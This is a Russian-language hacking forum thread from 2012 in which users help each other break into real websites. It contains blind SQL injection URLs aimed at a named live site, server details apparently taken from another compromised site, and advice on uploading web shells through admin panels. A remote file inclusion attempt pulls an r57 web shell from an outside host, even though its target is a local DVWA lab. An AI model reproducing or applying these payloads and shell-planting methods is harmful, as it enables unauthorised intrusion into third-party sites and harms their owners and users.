HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19361  
Старый 26.01.2012, 23:34
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Такой вопрос,

Цитата:
Сообщение от None  
http://britishcat.ru/articlees5314+union+select+1,2,3,4.html
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)
 
Ответить с цитированием

  #19362  
Старый 27.01.2012, 00:42
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Такой вопрос,
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)
Скуля однозначно

Код:
Code:
http://britishcat.ru/articlees5354/**/and/**/1=1.html  TRUE

http://britishcat.ru/articlees5354/**/and/**/1=2.html  FALSE

http://britishcat.ru/articlees5354/**/and/**/1=1/**/group/**/by/**/1.html
Крути как слепую

Код:
Code:
http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=5.html   TRUE

http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=4.html   FALSE
 
Ответить с цитированием

  #19363  
Старый 27.01.2012, 01:17
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок
Код:
Code:
Цhttp://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'
Ничё интересного там нет... Прав на запись тоже...

Код:
Code:
FreeBSD cl1108.azar-a.net 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0: 
1004 ( apache ) Group: 1003 ( apache )
5.2.17 
Safe mode: OFF
/home/admin/domains/gorod-dolgoprudny.ru/public_html/ drwxr-xr-x
 
Ответить с цитированием

  #19364  
Старый 27.01.2012, 02:49
h.elg
Guest
Сообщений: n/a
Провел на форуме:
2435

Репутация: 0
По умолчанию

Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
 
Ответить с цитированием

  #19365  
Старый 27.01.2012, 03:19
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от h.elg  
h.elg said:
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
если там только html то никак, ищи другие возможности, качалки там разные, в редакторах обычно качалка шела есть
 
Ответить с цитированием

  #19366  
Старый 27.01.2012, 04:28
Iggy
Guest
Сообщений: n/a
Провел на форуме:
26362

Репутация: 1
По умолчанию

BigBear через фото галерею шелл запилил?
 
Ответить с цитированием

  #19367  
Старый 27.01.2012, 11:48
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Iggy  
Iggy said:
BigBear
через фото галерею шелл запилил?
нет, не через фотогалерею.
 
Ответить с цитированием

  #19368  
Старый 27.01.2012, 18:01
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию

Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.

Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки :



Если я пишу любое слово после page= то показывает ошибки :



Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?

Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )

Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.

Спасибо.
 
Ответить с цитированием

  #19369  
Старый 27.01.2012, 19:03
h.elg
Guest
Сообщений: n/a
Провел на форуме:
2435

Репутация: 0
По умолчанию

Нашел там прикрепить фотографию к новосте, открывается страница uploadp.php, пробовал загрузил шелл, пишет unable to move file...
 
Ответить с цитированием

  #19370  
Старый 27.01.2012, 19:36
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

Цитата:
Сообщение от NZT  
NZT said:
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки

Если я пишу любое слово после page= то показывает ошибки

Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?
Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )
Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.
Спасибо.
подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ